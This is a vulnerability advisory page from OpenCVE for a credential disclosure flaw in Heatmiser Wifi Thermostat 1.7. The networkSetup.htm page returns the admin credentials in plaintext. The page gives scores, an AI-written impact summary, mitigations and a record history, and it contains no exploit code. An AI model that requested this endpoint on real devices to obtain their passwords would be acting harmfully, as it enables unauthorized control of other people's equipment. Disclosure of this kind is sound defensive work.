Description
Heatmiser Wifi Thermostat 1.7 contains a credential disclosure vulnerability that allows unauthenticated attackers to retrieve administrative credentials by accessing the networkSetup.htm page. Attackers can request the networkSetup.htm endpoint and extract plaintext username and password values from HTML form fields to gain administrative access to the thermostat.
Published: 2026-05-29
Score: 8.7 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Heatmiser Wifi Thermostat firmware version 1.7 contains a credential disclosure flaw that lets an unauthenticated attacker retrieve the administrator username and password by requesting the networkSetup.htm page. The vulnerability arises from the thermostat presenting these credentials in plaintext within HTML form fields, allowing direct extraction without prior authentication. This exposes the appliance to full administrative control, compromising both confidentiality and integrity.

Affected Systems

The affected product is the Heatmiser Wifi Thermostat running firmware 1.7. No other vendors, products, or firmware versions are listed as impacted.

Risk and Exploitability

The flaw has a CVSS score of 8.7, indicating a high severity. EPSS information is unavailable, so the current probability of exploitation cannot be quantified. The vulnerability is not listed in the CISA KEV catalog. Attackers can exploit it remotely by sending an unauthenticated HTTP request to the thermostat’s web interface, specifically the networkSetup.htm endpoint; the required conditions are simply network connectivity to the device.

Generated by OpenCVE AI on May 29, 2026 at 17:41 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update the thermostat firmware to a version that removes or protects the networkSetup.htm page or credentials.
  • Configure network access controls or firewall rules to block or restrict external access to the networkSetup.htm endpoint, allowing only trusted local devices to reach it.
  • If a patch is not available, change the device’s administrator credentials immediately and enforce a strong password policy.

Generated by OpenCVE AI on May 29, 2026 at 17:41 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Fri, 29 May 2026 20:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 29 May 2026 18:00:00 +0000

Type Values Removed Values Added
First Time appeared Heatmiser
Heatmiser heatmiser Wifi Thermostat
Vendors & Products Heatmiser
Heatmiser heatmiser Wifi Thermostat

Fri, 29 May 2026 16:15:00 +0000

Type Values Removed Values Added
Description Heatmiser Wifi Thermostat 1.7 contains a credential disclosure vulnerability that allows unauthenticated attackers to retrieve administrative credentials by accessing the networkSetup.htm page. Attackers can request the networkSetup.htm endpoint and extract plaintext username and password values from HTML form fields to gain administrative access to the thermostat.
Title Heatmiser Wifi Thermostat 1.7 Credential Disclosure via networkSetup.htm
Weaknesses CWE-256
References
Metrics cvssV3_1

{'score': 7.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}

cvssV4_0

{'score': 8.7, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N'}

Subscriptions

Heatmiser Heatmiser Wifi Thermostat
cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-05-29T19:26:56.914Z

Reserved: 2026-05-29T11:39:31.982Z

Link: CVE-2018-25396

cve-icon Vulnrichment

Updated: 2026-05-29T19:26:42.591Z

cve-icon NVD

Status : Received

Published: 2026-05-29T16:16:19.107

Modified: 2026-05-29T16:16:19.107

Link: CVE-2018-25396

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-29T17:45:04Z

Weaknesses